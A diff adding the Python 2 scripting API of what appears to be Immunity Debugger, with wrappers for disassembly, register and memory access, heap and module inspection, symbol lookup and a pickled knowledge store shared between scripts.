+ self.osversion = os[ 1 ].lower()
+ self.osrelease = os[ 2 ].lower()
+
+ # we want to distinguish Vista over other Windows.
+ self.isVista = self.getOsRelease()[0] == '6'
+
+ self.Eventndx = { debugger.CREATE_PROCESS_DEBUG_EVENT : CreateProcessEvent,
+ debugger.CREATE_THREAD_DEBUG_EVENT : CreateThreadEvent,
+ debugger.EXCEPTION_DEBUG_EVENT : ExceptionEvent,
+ debugger.EXIT_PROCESS_DEBUG_EVENT : ExitProcessEvent,
+ debugger.EXIT_THREAD_DEBUG_EVENT : ExitThreadEvent,
+ debugger.LOAD_DLL_DEBUG_EVENT : LoadDLLEvent,
+ debugger.OUTPUT_DEBUG_STRING_EVENT : OutputDebugEvent,
+ debugger.UNLOAD_DLL_DEBUG_EVENT : UnloadDLLEvent,
+ debugger.RIP_EVENT : RIPEvent }
+
+ self.clearState()
+
+ def log(self, msg):
+ return self.Log(msg)
+
+ def clearState(self):
+ self.Symbols = DictTypes()
+ self.Handles = DictTypes()
+ self.Threads = DictTypes()
+ self.MemoryPages = DictTypes()
+ self.Modules = DictTypes()
+ self.BackTrace = []
+ self.HeapsAddr = []
+ self.Heaps = {}
+
+
+ ### Get the ultimate solution ###
+ def getShellcodeExecutionNoMatterWhat(self):
+ return self.Error("%d" % (0x15 * 2))
+
+
+ ### Immunity Debugger Knowledge ###
+ # Sharing information between scripts
+
+ def addKnowledge(self, id, object, force_add = 0x0):
+ """
+ This function add a python object to the knowledge database.
+
+ @type id: STRING
+ @param id: unique name tag of the object
+
+ @type object: Python object
+ @param object: Object to be saved in the knowledge database
+ """
+
+ pickled_object=pickle.dumps(object)
+ return debugger.AddKnowledge(pickled_object,id, force_add)
+
+ def getKnowledge(self,id):
+ """
+ Gets python object from the knowledge database.
+
+ @type id: STRING
+ @param id: unique name tag of the object
+
+ @rtype: PYTHON OBJECT
+ @return: Object retrieved from the knowledge database
+ """
+ pickled_object=debugger.GetKnowledge(id)
+ #try:
+ if not pickled_object:
+ return None
+ return pickle.loads(pickled_object)
+
+ def listKnowledge(self):
+ """
+ Gets the list of saved objects in the knowledge database.
+
+ @rtype: TUPLE
+ @return: List of String ids currently saved
+ """
+ return debugger.ListKnowledge()
+
+ def findPacker(self, name, OnMemory = True):
+ """
+ Find possible Packer/Cryptors/etc on a Module
+
+ @type name: STRING
+ @param name: Module name
+
+ @type OnMemory: (Optional, Def: True) BOOLEAN
+ @param OnMemory: Whether to look in memory or on a file.
+
+ @rtype: LIST of TUPLES in the form of (DWORD, LIST OF STRING)
+ @return: A list of the Packer founded (Offset, List of Packer found in that address)
+ """
+ if OnMemory:
+ mem = self.getMemoryPagebyOwner(name)
+ if not mem:
+ raise Exception, "Coudln't find a Memory Page belonging to %s" % name
+ data = ""
+ for a in mem:
+ data+= a.getMemory()
+ else:
+ mod = self.getModule( name )
+ if not mod:
+ raise Exception, "Coudln't find the correct Module belonging to %s" % name
+ data = mod.getPath()
+
+ import pefile
+ import peutils
+ if OnMemory:
+ pe = pefile.PE( data = data )
+ else:
+ pe = pefile.PE( name = data )
+
+ sig_db = peutils.SignatureDatabase('Data/UserDB.TXT')
+ return sig_db.match( pe )
+
+ def forgetKnowledge(self,id):
+ """
+ Remove python object from knowledge database.
+
+ @type id: STRING
+ @param id: unique name tag of the object
+ """
+ return debugger.ForgetKnowledge(id)
+
+ def cleanKnowledge(self):
+ """ Clean ID memory from known objects
+ """
+ for ke in self.listKnowledge():
+ self.forgetKnowledge(ke)
+
+
+ def addGenHook(self,object):
+ """
+ Add a hook to Immunity Debugger
+ """
+
+ import pickle
+ try:
+ rtype=object.type
+ except:
+ rtype=0
+ try:
+ label=object.label
+ except:
+ label="No Label specified for this hook"
+ pickled_object=pickle.dumps(object)
+ debugger.Addhook(pickled_object,label,rtype)
+
+
+ def cleanHooks(self):
+ """
+ Clean ID memory from hook objects
+ """
+ for hk in self.listHooks():
+ debugger.Removehook(hk)
+
+
+
+ def cleanUP(self):
+ """
+ Clean ID memory for every kind of object saved in it
+ """
+ self.cleanHooks()
+ self.cleanKnowledge()
+
+
+ def getPEBaddress(self):
+ """
+ Gets PEB.
+ @rtype: DWORD
+ @return: PEB address
+ """
+ return debugger.GetPEB()
+
+
+
+ ### Disassembling / Analyzing Functions / etc ###
+
+ def analyseCode(self,address):
+ """
+ Analyse module's code
+
+ @type Address: DWORD
+ @param Address: Address from module to be analysed
+ """
+ debugger.Analysecode(address)
+
+ def isAnalysed(self,address):
+ """
+ Check if module is already analysed
+
+ @type Address: DWORD
+ @param Address: Address from module
+
+ @rtype: DWORD
+ @return: 1 if module already analysed
+ """
+ ret = debugger.IsAnalysed(address)
+
+ if ret == -1:
+ return 0
+ else:
+ return ret
+
+ def setVariable(self,address,string):
+ """
+ Set Variable name to specified address.
+
+ @type Address: DWORD
+ @param Address: Address from assembly line
+
+ @type String: STRING
+ @param String: Variable name to be set
+
+ """
+ return debugger.SetVariable(address,string)
+
+ def getVariable(self,address):
+ """
+ Get Variable name from specified address
+
+ @type Address: DWORD
+ @param Address: Address from assembly line
+
+ @rtype: STRING
+ @return: Variable name for given address.
+
+ """
+ return debugger.GetVariable(address)
+
+
+ # Disasm tooks 0.00008130 usec/pass
+ def Disasm(self, address, mode = DISASM_ALL):
+ """
+ Disasm address
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type Mode: (Optional, Def: DISASM_ALL)
+ @param Mode: Disasm mode
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+
+ op= opCode( self, address )
+ op._getfromtuple( debugger.Disasm( address, mode) )
+ return op
+
+ # Disasm tooks 0.00008130 usec/pass
+
+ def disasm(self, address, mode = DISASM_ALL):
+ return self.Disasm(address, mode)
+
+
+ # DisasmSize 0.00007515 usec/pass
+ def disasmSizeOnly(self, address):
+ """
+ Determine command size only
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_SIZE)
+
+ # DisasmData 0.00007375 usec/pass
+ def disasmData(self, address):
+ """
+ Determine size and analysis data
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_DATA)
+
+ def disasmTrace(self, address):
+ """
+ Trace integer registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_TRACE)
+
+ # DisasmFile 0.00007934 usec/pass
+ def disasmFile(self, address):
+ """
+ Disassembly, no symbols/registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_FILE)
+
+ # DisasmCode 0.00008549 usec/pass
+ def disasmCode(self, address):
+ """
+ Disassembly, registers undefined
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_CODE)
+
+ def disasmRTrace(self, address):
+ """
+ Disassemble with run-trace registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.Disasm(address, DISASM_RTRACE)
+
+
+ def disasmForward( self, address, nlines=1, mode = DISASM_ALL):
+ """
+ Disasm nlines forward of given address
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @type Mode: (Optional, Def: DISASM_ALL)
+ @param Mode: Disasm mode
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ forward_address = debugger.Disasmforward( address, nlines )
+ op=opCode( self, forward_address )
+ op._getfromtuple( debugger.Disasm( forward_address, mode ) )
+ return op
+
+
+
+ def disasmForwardAddressOnly(self, address, nlines=1):
+ """
+ Disasm nlines forward to the given address
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @type Mode: (Optional, Def: DISASM_ALL)
+ @param Mode: Disasm mode
+
+ @rtype: DWORD
+ @return: Address of the opcode
+ """
+ return debugger.Disasmforward(address,nlines)
+
+ def disasmForwardSizeOnly(self, address, nlines=1):
+ """
+ Determine command size only
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmForward(address, nlines, DISASM_SIZE)
+
+ def disasmForwardData(self, address, nlines=1):
+ """
+ Determine size and analysis data
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+
+ """
+ return self.disasmForward(address, nlines, DISASM_DATA)
+
+ def disasmForwardTrace(self, address, nlines=1):
+ """
+ Trace integer registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmForward(address, nlines, DISASM_TRACE)
+
+ def disasmForwardFile(self, address, nlines=1):
+ """
+ Disassembly, no symbols/registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmForward(address, nlines, DISASM_FILE)
+
+ def disasmForwardCode(self, address, nlines=1):
+ """
+ Disassembly, registers undefined
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmForward(address, DISASM_CODE)
+
+ def disasmForwardRTrace(self, address, nlines=1):
+ """
+ Disassemble with run-trace registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmForward(address, nlines, DISASM_RTRACE)
+
+ def disasmBackward( self, address, nlines = 1, mode = DISASM_ALL):
+ """
+ Disasm nlines backward from the given address
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ backward_address = debugger.Disasmbackward( address, nlines )
+ op = opCode( self, backward_address )
+ op._getfromtuple( debugger.Disasm( backward_address, mode ) )
+ return op
+
+ def disasmBackwardAddressOnly(self,address,nlines=1):
+ """
+ Disasm nlines backward of given address
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: DWORD
+ @return: Address of the Opcode"""
+ return debugger.Disasmbackward(address,nlines)
+
+
+
+ def disasmBackwardSizeOnly(self, address, nlines = 1):
+ """
+ Determine command size only
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_SIZE)
+
+ def disasmBackwardData(self, address, nlines = 1):
+ """
+ Determine size and analysis data
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_DATA)
+
+ def disasmBackwardTrace(self, address, nlines = 1):
+ """
+ Trace integer registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_TRACE)
+
+ def disasmBackwardFile(self, address, nlines = 1):
+ """
+ Disassembly, no symbols/registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_FILE)
+
+ def disasmBackwardCode(self, address, nlines = 1):
+ """
+ Disassembly, registers undefined
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_CODE)
+
+ def disasmBackwardRTrace(self, address, nlines = 1):
+ """
+ Disassemble with run-trace registers
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @type nlines: DWORD
+ @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ return self.disasmBackward(address, nlines, DISASM_RTRACE)
+
+ def findDecode(self, address):
+ """
+ Get the internal decode information from an analysed module
+
+ @type Address: DWORD
+ @param Address: Address in the range of the module page
+
+ @rtype: Decode OBJECT
+ @return: Decode Object containing the analized information
+ """
+ return Decode( address )
+ #return debugger.FindDecode( address )
+
+ def goNextProcedure(self):
+ """
+ Go to next procedure
+
+ @rtype: DWORD
+ @return: Address of next procedure
+ """
+ return debugger.GoNextProcedure()
+
+ def goPreviousProcedure(self):
+ """
+ Go to previous procedure
+
+ @rtype: DWORD
+ @return: Address of previous procedure
+ """
+ return debugger.GoPreviousProcedure()
+
+ def getOpcode(self,address):
+ """
+ Get address's Opcode
+
+ @type Address: DWORD
+ @param Address: Address to disasm
+
+ @rtype: opCode Object (Check libanalyze.py)
+ @return: Disassmbled Opcode
+ """
+ op=opCode(self, address)
+ op._getfromtuple(debugger.Disasm(address))
+ return op
+
+ def Assemble(self, code,address=0x0):
+ """
+ Assemble code.
+
+ @type code: STRING
+ @param code: Code to be assembled
+
+ @rtype: STRING
+ @return: Opcodes of the assembled code
+ """
+ opcode = []
+ for line in code.split("\n"):
+ line = line.strip()
+ if line:
+ opcode.append( debugger.Assemble(line,address) )
+ return string.joinfields( opcode, "")
+
+ def decodeAddress(self,address):
+ """
+ Decode given address
+
+ @rtype: STRING
+ @return: decoded value
+ """
+ return debugger.DecodeAddress(address)
+
+ def undecorateName(self,decorated):
+ """
+ Undecorate given name
+
+ @type decorated: STRING
+ @param decorated: decorated name
+ @rtype: STRING
+ @return: undecorated name
+ """
+ return debugger.UndecorateName(decorated)
+
+ def getTraceArgs(self, address, tracedarg, shownonusersupplied = False):
+ """
+ Trace Parameters of a function, return only when is user-supplied
+
+ @type Address: DWORD
+ @param Address: Address of the function call
+
+ @type Tracedarg: DWORD
+ @param Tracedarg: Parameter to trace
+
+ @type Shownonusersupplied: BOOLEAN
+ @param Shownonusersupplied: (Optional, Def: False) Flag whether or not show user supplied param
+
+ @rtype: TUPLES
+ @return: Returns a tuple of (Push Opcode, TABLE of OPCODES setting the PUSH)
+ """
+ t = TraceArgs( self, address, tracedarg, shownonusersupplied )
+ return t.get()
+
+ def getAllFunctions(self,address):
+ """
+ Gets all function of given module's address
+
+ @rtype: LIST
+ @return: Function start address
+ """
+ return debugger.Getallfunctions(address)
+
+ def getFunction(self, address):
+ """
+ Get the Function information
+
+ @type Address: DWORD
+ @param Address: Address of the function
+
+ @rtype: Function Object
+ @return: Function Object containing information of the requested function
+
+ """
+ return Function(self, address)
+
+ def getFunctionBegin(self,address):
+ """
+ Find start address of funcion
+
+ @rtype: DWORD
+ @return: Start Address"""
+ return debugger.Getfuncbegin(address)
+
+ def getFunctionEnd(self, function_address):
+ """
+ Get all the possible ends of a Function
+
+ @type function_address: DWORD
+ @param function_address: Address of the function
+
+ @rtype: LIST
+ @return: List of Address of all the possible ret address
+ """
+ if type(function_address) in (type(1), type(1L)):
+ func = self.getFunction( function_address )
+ return func.getFunctionEnd()
+ elif isinstance(function_address, Function):
+ return function_address.getFunctionEnd()
+ else:
+ raise Exception, "Function type not recognized"
+
+ #def getFunctionEnd(self,address):
+ #"""
+ #Find end address of funcion (Deprecated, use Function)
+
+ #@rtype: DWORD
+ #@return: End address
+ #"""
+ #return debugger.Getfuncend(address)
+
+ def getAllBasicBlocks(self,address):
+ """
+ Gets all basic blocks of given procedure (Deprecated, use Function)
+
+ @rtype: LIST
+ @return: (start,end) addresses of basic blocks
+ """
+ bblocks = debugger.Getallbasicblocks(address)
+ basicblocks = []
+ if bblocks:
+ for block in bblocks:
+ basicblocks.append(basicBlock(self,block[0],block[1]))
+ return basicblocks
+
+ def findDataRef(self,address):
+ """
+ Find data references to given address
+
+ @rtype: LIST
+ @return: Table with found references
+ """
+ return debugger.FindDataRef(address)
+
+ def getXrefFrom(self, address):
+ """
+ Get X Reference from a given address
+
+ @type Address: DWORD
+ @param Address: Address
+
+ @rtype: LIST
+ @return: List of X reference from the given address
+ """
+ for mod in self.getAllModules():
+ xref = mod.getXrefFrom(address)
+
+ if xref: return xref
+ return []
+
+ def getXrefTo(self, address):
+ """
+ Get X Reference to a given address
+
+ @type Address: DWORD
+ @param Address: Address
+
+ @rtype: LIST
+ @return: List of X reference to the given address
+ """
+ for mod in self.getAllModules():
+ xref = mod.getXrefTo(address)
+
+ if xref: return xref
+ return []
+
+ def getInterCalls(self,address):
+ """
+ Get intermodular calls
+
+ @type Address: DWORD
+ @param Address: Address
+
+ @rtype: DICTIONARY
+ @return: Dict of intermodular calls to the given address
+ """
+ self.gotoDisasmWindow(address)
+ return debugger.GetInterCalls(address)
+
+
+ ### Gathering Information for the debugged process ###
+ # All kind of information that can be gathered for the process (PEB, Heap, Events, Modules, etc)
+
+ def getRegs(self):
+ """
+ Get CPU Context values.
+
+ @rtype: DICTIONARY
+ @return: x86 Registers
+ """
+ return debugger.Getregs()
+
+ def getRegsRepr(self):
+ """
+ We have to do this to handle the Long integers, which XML-RPC cannot do
+
+ @rtype: DICTIONARY
+ @return: x86 registers in string format (repr)
+ """
+ regs=self.getRegs()
+
+ for r in regs:
+ regs[r]=repr(regs[r])
+ return regs
+
+ def setReg(self,reg,value):
+ """
+ Set REG value
+
+ @type reg: STRING
+ @param reg: Register name
+
+ @type value: DWORD
+ @param vale: Value to set the register
+ """
+ return debugger.Setreg(Register[reg],value)
+
+ def getPEB(self):
+ """
+ Get the PEB information of the debugged process
+
+ @rtype: PEB OBJECT
+ @return: PEB """
+
+ return PEB(self)
+
+
+ def getHeap(self, addr, restore = False):
+ """
+ Get Heap Information
+
+ @type addr: DWORD
+ @param addr: Address of the heap
+
+ @type restore: BOOLEAN
+ @param restore: (Optional, Def: False) Flag whether or not use a restore heap
+
+ @rtype: PHeap OBJECT
+ @return: Heap
+ """
+ if self.Heaps.has_key(addr):
+ return self.Heaps[addr]
+
+ if self.isVista:
+ pheap = libheap.VistaPHeap( self, addr, restore )
+ else:
+ pheap = libheap.PHeap( self, addr, restore )
+
+ if pheap:
+ self.Heaps[addr] = pheap
+ return pheap
+
+ def getDebuggedName(self):
+ """
+ Get debugged name
+
+ @rtype: STRING
+ @return: Name of the Process been debugged
+ """
+ return debugger.getDebuggedName()
+
+ def getDebuggedPid(self):
+ """
+ Get debugged pid
+
+ @rtype: DWORD
+ @return: Process ID
+ """
+ return debugger.getPID()
+
+ def isAdmin(self):
+ """
+ Is debugger running as admin?
+ @rtype: INTEGER
+ @return: 1 if running as admin
+ """
+ return debugger.IsAdmin()
+
+ def getInfoPanel(self):
+ """
+ Get information displayed on Info Panel
+
+ @rtype: TUPLE
+ @return: Python Tuple with the 3 lines from InfoPanel
+ """
+ return debugger.Getinfopanel()
+
+ def getCurrentAddress(self):
+ """
+ Get the current address been focus on the Disasm window
+
+ @rtype: DWORD
+ @return: Address
+ """
+ return debugger.GetCurrentAddress()
+
+
+ def getAllModules(self):
+ """
+ Get all loaded modules.
+
+ @rtype: DICTIONARY
+ @return: Dict of Modules
+ """
+
+ if self.Modules:
+ return self.Modules
+
+ modulos = debugger.Getallmodules()
+ symbol = 1
+ for mod in modulos.keys():
+ if not self.Modules.has_key(mod):
+ # Modules are stable
+ m = Module(mod, modulos[mod][0], modulos[mod][1], modulos[mod][2])
+ mod_dict = self._getmoduleinfo(modulos[mod][0])
+ m.setModuleExtension(mod_dict)
+ if symbol:
+ self.getAllSymbols() #_getsymbols()
+ symbol = 0
+
+ try:
+ m.setSymbols( self.Symbols[ mod.lower() ] )
+ except KeyError:
+ pass
+ self.Modules[mod] = m
+ # XXX TODO: Here we must check between the modules that are loaded and the catched one on self.Modules
+ # so we know if a module is not there anymore
+
+ return self.Modules
+
+ def getModulebyAddress(self, address):
+
+ modulos = debugger.Getallmodules()
+
+ for name in modulos.keys():
+ total_range = modulos[name][0] + modulos[name][1]
+ if address > modulos[name][0] and address < total_range:
+ if not self.Modules.has_key(name):
+ m = Module(name, modulos[name][0], modulos[name][1], modulos[name][2])
+ mod_dict = self._getmoduleinfo(modulos[name][0])
+ m.setModuleExtension(mod_dict)
+ self.Modules[name] = m
+ return m
+ else:
+ return self.Modules[name]
+
+ def getModule(self, name):
+ """
+ Get Module Information
+
+ @type name: STRING
+ @param name: Name of the module
+
+ @rtype: Module OBJECT
+ @return: A Module object
+ """
+
+ #self.getAllModules()
+
+ modulos = debugger.Getallmodules()
+ if modulos.has_key(name):
+ if not self.Modules.has_key(name):
+ # Modules are stable
+ m = Module(name, modulos[name][0], modulos[name][1], modulos[name][2])
+ mod_dict = self._getmoduleinfo(modulos[name][0])
+ m.setModuleExtension(mod_dict)
+ #if symbol:
+ # self.getAllSymbols() #_getsymbols()
+ # symbol = 0
+
+ #try:
+ # m.setSymbols( self.Symbols[ mod.lower() ] )
+ #except KeyError:
+ # pass
+ self.Modules[name] = m
+ return m
+ else:
+ return self.Modules[name]
+
+ #if type(name) == type(''):
+ # try:
+ # return self.Modules[ name ]
+ # except KeyError:
+ # return None
+ #else:
+ # for mod in self.Modules.keys():
+ # if self.Modules[ mod ].baseaddress == name:
+ # return self.Modules[ mod ]
+ return None
+
+ def _getmoduleinfo(self,base_address):
+ return debugger.Getmodinfo(base_address)
+
+ def getReferencedStrings(self,code_base):
+ """
+ Get all referenced string from module
+
+ @type name: DWORD
+ @param name: Code Base Address
+ @rtype: LIST
+ @return: A list of tuples with referenced strings (address, string, comment)
+ """
+ return debugger.Getreferencedstrings(code_base)
+
+ def Ps(self):
+ """
+ List all active processes.
+
+ @rtype: LIST
+ @return: A list of tuples with process information (pid, name, path, services, tcp list, udp list)
+ """
+ return debugger.ps()
+
+ def ps(self):
+ """
+ List all active processes.
+
+ @rtype: LIST
+ @return: A list of tuples with process information (pid, name, path, services, tcp list, udp list)
+ """
+ return self.Ps()
+
+ def getSehChain(self):
+ """
+ Get the SEH chain.
+
+ @rtype: LIST
+ @return: A list of tuples with SEH information (seh, handler)
+ """
+ return debugger.Getsehchain()
+
+ def getEvent(self):
+ """
+ Get the current Event
+
+ @rtype: Event Object
+ @return: Event
+ """
+ event = debugger.Getevent()
+ EventCode = event[0][0]
+ try:
+ return self.Eventndx[ EventCode ]( event )
+ except KeyError: # We cannot handle this event
+ return None
+
+ def getPage(self, addr):
+ """
+ Get a memory page.
+
+ @type addr: DWORD
+ @param addr: Address of a beginning of the Page
+
+ @rtype: Page OBJECT
+ @return: Memory Page
+ """
+ self.getMemoryPages()
+ try:
+ return self.MemoryPages[addr]
+ except KeyError:
+ return None
+
+ def getMemoryPagebyOwner(self, owner):
+ """
+ Get the Memory Pages belonging to the given dll.
+
+ @type owner: STRING
+ @param owner: Name of the dll
+
+ @rtype: LIST
+ @return: LIST of Memory Pages belonging to the given dll
+ """
+ self.getMemoryPages()
+
+ pages = []
+ for a in self.MemoryPages.keys():
+ mem = self.MemoryPages[a]
+ if mem.getOwner() == owner:
+ pages.append( mem )
+
+ return pages
+
+ def getMemoryPagebyOwnerAddress(self, owner_addr):
+ """
+ Get the Memory Pages belonging to the given dll by its base address.
+
+ @type owner: STRING
+ @param owner: Name of the dll
+
+ @rtype: LIST
+ @return: LIST of Memory Pages belonging to the given dll
+ """
+ self.getMemoryPages()
+
+ pages = []
+ for a in self.MemoryPages.keys():
+ mem = self.MemoryPages[a]
+ if mem.owner == owner_addr:
+ pages.append( mem )
+
+ return pages
+
+ def getMemoryPagebyAddress(self, address):
+ """
+ Get a memory page.
+
+ @type address: DWORD
+ @param address: Address in the range of the Page
+
+ @rtype: Page OBJECT
+ @return: Memory Page
+ """
+
+ self.getMemoryPages()
+ for a in self.MemoryPages.keys():
+ mem = self.MemoryPages[a]
+ if mem.baseaddress <= address and (mem.getBaseAddress() + mem.size) > address :
+ return mem
+ return None
+
+ def getMemoryPages(self):
+ """
+ Get All memory pages.
+
+ @rtype: DICTIONARY
+ @return: List of all memory pages
+ """
+ if self.MemoryPages:
+ return self.MemoryPages
+
+ pages = debugger.Getmemorypages()
+
+ for addr in pages.keys():
+ m = MemoryPage(addr, self)
+ m._getfromtuple(pages[addr])
+ self.MemoryPages[addr] = m
+ return self.MemoryPages
+
+ def vmQuery(self,address):
+ """
+ Query Memory Page
+
+ @type address: DWORD
+ @param address: Base Address of memory page
+
+ @rtype: Python List
+ @return: List with memory page structure
+ """
+ return debugger.VmQuery(address)
+
+
+ def getAllHandles(self):
+ """
+ Get all handles.
+
+ @rtype: DICTIONARY
+ @return: All the process handles
+ """
+ if self.Handles:
+ return self.Handles
+
+ handles = debugger.Getallhandles()
+ for h in handles.keys():
+ H = Handle( h )
+ H._getfromtuple( handles[h] )
+ self.Handles[ h ] = H
+ return self.Handles
+
+ def getAllThreads(self):
+ """
+ Get all threads.
+ @rtype: LIST
+ @return: All process threads
+ """
+ threads = debugger.Getallthreads()
+ for thread in threads:
+ T = Thread(thread)
+ T._getfromtuple(thread)
+ self.Threads[T.getId()] = T
+ return self.Threads
+
+
+
+
+ def getAllSymbols(self):
+ """
+ Get All Symbols.
+
+ @rtype: DICTIONARY
+ @return: All the symbols of the process
+ """
+ if self.Symbols:
+ return self.Symbols
+
+ names = debugger.Getallnames()
+ current = self.getDebuggedName().rsplit(".", 1)[0]
+ # reorder it a little bit
+ for a in names.keys():
+ s=Symbol(a)
+ s._getfromtuple( names[a] )
+ if current.lower() != s.getModule().lower():
+ module = s.getModule() + ".dll"
+ else:
+ module = s.getModule() + ".exe"
+
+ if self.Symbols.has_key( module ):
+ self.Symbols[ module ][ a ] = s
+ else:
+ self.Symbols[ module ] = { a : s }
+
+ return self.Symbols
+
+ def getAllSymbolsFromModule(self,address):
+ """
+ Get Symbols from module.
+ @type Address: DWORD
+ @param Address: Address from module.
+
+ @rtype: DICTIONARY
+ @return: All the symbols of the module
+ """
+
+ names = debugger.Getallnames(address)
+ return names
+
+
+
+ def callStack(self):
+ """
+ Get a Back Trace (Call stack).
+
+ @rtype: LIST of Stack OBJECT
+ @return: list of all the stack trace
+ """
+ if self.BackTrace:
+ return self.BackTrace
+
+ callstack = debugger.Getcallstack()
+ for a in callstack:
+ s = Stack()
+ s._setfromtuple(a)
+ self.BackTrace.append(s)
+ return self.BackTrace
+
+ def getCallTree(self,address=0):
+ """
+ Get the call tree of given address.
+ @rtype: LIST of Call tuples
+ @return: list of all the call tree
+ ulong line; // Line number in column
+ ulong dummy; // Must be 1
+ ulong type; // Type, set of TY_xxx
+ ulong entry; // Address of function
+ ulong from; // Address of calling instruction
+ ulong calls; // Address of called subfunction
+ """
+
+ return debugger.Getcalltree(address)
+
+
+ def findModule(self, address):
+ """
+ Find which module an address belongs to.
+
+ @type address: DWORD
+ @param address: Address
+
+ @rtype: LIST
+ @return: Tuple of module information (name, base address)
+
+ """
+ mod = debugger.Findmodule( address )
+ if mod == -1:
+ mod = ()
+ return mod
+
+ def getHeapsAddress(self):
+ """
+ Get a the process heaps
+
+ @rtype: LIST of DWORD
+ @return: List of Heap Address
+ """
+ self.HeapsAddr = []
+
+ peb = self.getPEB()
+ addr = peb.ProcessHeaps
+ for ndx in range(0, peb.NumberOfHeaps):
+ l = self.readLong( addr + ndx * 4 )
+ if l:
+ self.HeapsAddr.append( l )
+
+ return self.HeapsAddr
+
+ def getAddressOfExpression(self, expression):
+ """
+ Get the address from an expression as ntdll.RtlAllocateHeap
+
+ @type expression: STRING
+ @param expression: Expression to translate into an address
+
+ @rtype: DWORD
+ @return: Address of the Expression
+ """
+ return debugger.Getaddrfromexp(expression)
+
+
+ def getAddress(self, expression):
+ """
+ Get the address from an expression as ntdll.RtlAllocateHeap
+
+ @type expression: STRING
+ @param expression: Expression to translate into an address
+
+ @rtype: DWORD
+ @return: Address of the Expression
+
+ """
+ return debugger.Getaddrfromexp(expression)
+
+ ### Displaying information ###
+ # Error, Log, Creating new windows, etc
+
+ def Error(self, msg):
+ """
